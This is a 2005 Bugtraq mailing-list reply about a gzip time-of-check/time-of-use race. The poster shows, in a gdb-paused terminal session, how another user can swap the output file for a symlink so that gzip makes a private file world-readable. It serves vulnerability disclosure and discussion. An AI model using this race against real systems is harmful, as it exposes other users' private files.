Bugtraq mailing list archives
Re: gzip TOCTOU file-permissions vulnerability
From: Joey Hess <joeyh () debian org>
Date: Wed, 13 Apr 2005 11:40:49 -0400
Martin Pitt wrote:
Of course the file can be removed by other users after gunzip has finished, but that is not a gzip bug, but the result of the really dumb idea to have a group/world-writeable directory without the sticky bit.
It may be really dumb, but it's pretty common practice too. Group-writable directories are often made setgid but I've never seen one made sticky. There's probably a lot of documentation that presents this as best practice if you trust your group members with access to files in the directory, and likely none of it mentions this kind of security issue. Just a few examples within the Debian project (since this is CCed to the Debian bts): joeyh@haydn:/var/lib/gforge/chroot/home/groups/d-i/htdocs>ls -ld . drwxrwsr-x 4 dummy d-i 4096 Jan 18 12:51 ./ joeyh@gluck:/org/cdimage.debian.org/www>ls -ld . drwxrwsr-x 4 manty debian-c 4096 Apr 7 09:11 ./ joeyh@merkel:/org/bugs.debian.org/spool>ls -ld . drwxrwsr-x 4 debbugs debbugs 4096 Apr 13 09:19 ./ (gzip is not typically ran in any of these directories AFAIK, FWIW).
Maybe I understood you wrong, could you please give a small test case which describes the vulnerability exactly?
I'm a wimp, so I will use gdb instead of writing some real exploit to win the race. joey@dragon:~/tmp/gzip-1.3.5>chmod 777 . joey@dragon:~/tmp/gzip-1.3.5>echo secret > ~/secret joey@dragon:~/tmp/gzip-1.3.5>chmod 400 ~/secret joey@dragon:~/tmp/gzip-1.3.5>ls -l ~/secret -r-------- 1 joey joey 7 Apr 13 11:32 /home/joey/secret joey@dragon:~/tmp/gzip-1.3.5>gdb ./gzip GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1". (gdb) b copy_stat Breakpoint 1 at 0x804ca19: file gzip.c, line 1725. (gdb) run -9 COPYING Starting program: /home/joey/tmp/gzip-1.3.5/gzip -9 COPYING Breakpoint 1, copy_stat (ifstat=0x0) at gzip.c:1725 1725 if (decompress && time_stamp != 0 && ifstat->st_mtime != time_stamp) { (gdb) zsh: suspended gdb ./gzip joey@dragon:~/tmp/gzip-1.3.5>ls -l COPYING.gz -rw------- 1 joey joey 6853 Apr 13 11:28 COPYING.gz joey@dragon:~/tmp/gzip-1.3.5>sudo su nobody Password: sh-3.00$ ln -s ~joey/secret COPYING.gz sh-3.00$ cat COPYING.gz cat: COPYING.gz: Permission denied dragon% zsh: exit 1 sudo su nobody joey@dragon:~/tmp/gzip-1.3.5>fg [2] - continued gdb ./gzip c Continuing. Program exited normally. (gdb) quit joey@dragon:~/tmp/gzip-1.3.5>ls -l ~/secret -r--r--r-- 1 joey joey 7 Jan 12 1999 /home/joey/secret -- see shy jo
Attachment:
signature.asc
Description: Digital signature
Current thread:
- gzip TOCTOU file-permissions vulnerability Imran Ghory (Apr 05)
- Re: gzip TOCTOU file-permissions vulnerability Martin Pitt (Apr 13)
- Re: gzip TOCTOU file-permissions vulnerability Derek Martin (Apr 13)
- Re: gzip TOCTOU file-permissions vulnerability Peter J. Holzer (Apr 13)
- Re: gzip TOCTOU file-permissions vulnerability Joey Hess (Apr 13)
- Re: gzip TOCTOU file-permissions vulnerability psz (Apr 14)
- Re: gzip TOCTOU file-permissions vulnerability Theodor Milkov (Apr 15)
- Re: gzip TOCTOU file-permissions vulnerability Derek Martin (Apr 14)
- <Possible follow-ups>
- RE: gzip TOCTOU file-permissions vulnerability Mark Senior (Apr 14)
- Re: gzip TOCTOU file-permissions vulnerability Derek Martin (Apr 14)
- Re: gzip TOCTOU file-permissions vulnerability devnull (Apr 15)
- Re: gzip TOCTOU file-permissions vulnerability Dmitry Yu. Bolkhovityanov (Apr 16)
- Re: gzip TOCTOU file-permissions vulnerability Peter J. Holzer (Apr 15)
- Re: gzip TOCTOU file-permissions vulnerability Scott Gifford (Apr 15)
- Re: gzip TOCTOU file-permissions vulnerability Steve Grubb (Apr 14)
- Re: gzip TOCTOU file-permissions vulnerability Martin Pitt (Apr 13)